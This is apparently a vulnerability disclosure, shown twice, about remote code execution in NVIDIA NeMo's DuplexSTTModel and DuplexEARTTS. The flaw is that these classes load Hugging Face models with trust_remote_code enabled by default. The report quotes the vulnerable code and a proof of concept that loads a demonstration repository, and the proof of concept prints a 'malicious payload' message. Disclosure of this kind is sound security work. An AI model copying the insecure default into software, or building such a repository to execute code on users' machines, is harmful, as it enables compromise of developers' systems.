Description
The NVIDIA NeMo library contains a remote code execution vulnerability in multiple model classes, including DuplexSTTModel and DuplexEARTTS. These classes load external Hugging Face models and tokenizers with trust_remote_code=True enabled by default, which allows execution of arbitrary code from remote repositories without requiring explicit user consent.
In DuplexSTTModel, the issue occurs when loading the pretrained language model through load_pretrained_hf. The trust_remote_code parameter is derived from configuration using self.cfg.get("trust_remote_code", True), meaning that if the user does not explicitly provide this field, it defaults to True. This results in automatic execution of remote code when loading models from external repositories.
A similar issue exists in DuplexEARTTS, where both the tokenizer and language model are initialized with trust_remote_code=True hardcoded. This forces remote code execution regardless of user intent or configuration, effectively bypassing the expected security boundary.
Root Cause
In DuplexSTTModel:
|
# Load LLM first |
|
llm = load_pretrained_hf( |
|
self.cfg.pretrained_llm, |
|
pretrained_weights=self.cfg.pretrained_weights, |
|
trust_remote_code=self.cfg.get("trust_remote_code", True), |
|
).train() |
Here, trust_remote_code defaults to True when not explicitly specified.
In DuplexEARTTS:
|
# Load tokenizer |
|
self.tokenizer = AutoTokenizer( |
|
self.cfg.pretrained_lm_name, |
|
use_fast=True, |
|
trust_remote_code=True, |
|
bos_token=self.cfg.get("bos_token", None), |
|
eos_token=self.cfg.get("eos_token", None), |
|
pad_token=self.cfg.get("pad_token", None), |
|
) # Note that we are using fast tokenizer |
and:
|
def _load_language_model(self, cfg): |
|
"""Load language model for RVQ-EAR-TTS.""" |
|
if cfg.pretrained_lm_name: |
|
language_model = load_pretrained_hf( |
|
self.cfg.pretrained_lm_name, pretrained_weights=True, trust_remote_code=True |
|
).eval() |
Proof of Concept
Take DuplexSTTModel as an example, I created an example model repository on Huggingface Hub for demonstration: XManFromXlab/nemo-DuplexSTTModel-RCE
A victim runs the following code (refer to the test_duplex_stt.py):
from nemo.collections.speechlm2 import DuplexSTTModel
model_id = "XManFromXlab/nemo-DuplexSTTModel-RCE"
cfg = {
"pretrained_llm": model_id,
"pretrained_weights": False,
"audio_loss_weight": 1,
"text_loss_weight": 3,
"source_sample_rate": 16000,
"validation_save_path": "/tmp/test_duplex_stt_logs",
"perception": {
"_target_": "nemo.collections.speechlm2.modules.perception.AudioPerceptionModule",
"preprocessor": {
"_target_": "nemo.collections.asr.modules.AudioToMelSpectrogramPreprocessor",
"features": 80,
},
"encoder": {
"_target_": "nemo.collections.asr.modules.ConformerEncoder",
"feat_in": 80,
"d_model": 512,
"n_heads": 8,
"n_layers": 1,
"subsampling_factor": 8,
},
"modality_adapter": {
"_target_": "nemo.collections.speechlm2.modules.perception.IdentityConnector",
"d_model": 512,
},
"output_dim": 2048,
},
"optimizer": {"_target_": "torch.optim.AdamW"},
}
model = DuplexSTTModel(cfg)
In this example, it will print the following warning messages:
Execute Malicious Payload!!!
Execute Malicious Payload!!!
Execute Malicious Payload!!!
Description
The NVIDIA NeMo library contains a remote code execution vulnerability in multiple model classes, including
DuplexSTTModelandDuplexEARTTS. These classes load external Hugging Face models and tokenizers withtrust_remote_code=Trueenabled by default, which allows execution of arbitrary code from remote repositories without requiring explicit user consent.In
DuplexSTTModel, the issue occurs when loading the pretrained language model throughload_pretrained_hf. Thetrust_remote_codeparameter is derived from configuration usingself.cfg.get("trust_remote_code", True), meaning that if the user does not explicitly provide this field, it defaults toTrue. This results in automatic execution of remote code when loading models from external repositories.A similar issue exists in
DuplexEARTTS, where both the tokenizer and language model are initialized withtrust_remote_code=Truehardcoded. This forces remote code execution regardless of user intent or configuration, effectively bypassing the expected security boundary.Root Cause
In
DuplexSTTModel:NeMo/nemo/collections/speechlm2/models/duplex_stt_model.py
Lines 82 to 87 in e990600
Here,
trust_remote_codedefaults toTruewhen not explicitly specified.In
DuplexEARTTS:NeMo/nemo/collections/speechlm2/models/duplex_ear_tts.py
Lines 94 to 102 in e990600
and:
NeMo/nemo/collections/speechlm2/models/duplex_ear_tts.py
Lines 176 to 181 in e990600
Proof of Concept
Take DuplexSTTModel as an example, I created an example model repository on Huggingface Hub for demonstration:
XManFromXlab/nemo-DuplexSTTModel-RCEA victim runs the following code (refer to the
test_duplex_stt.py):In this example, it will print the following warning messages: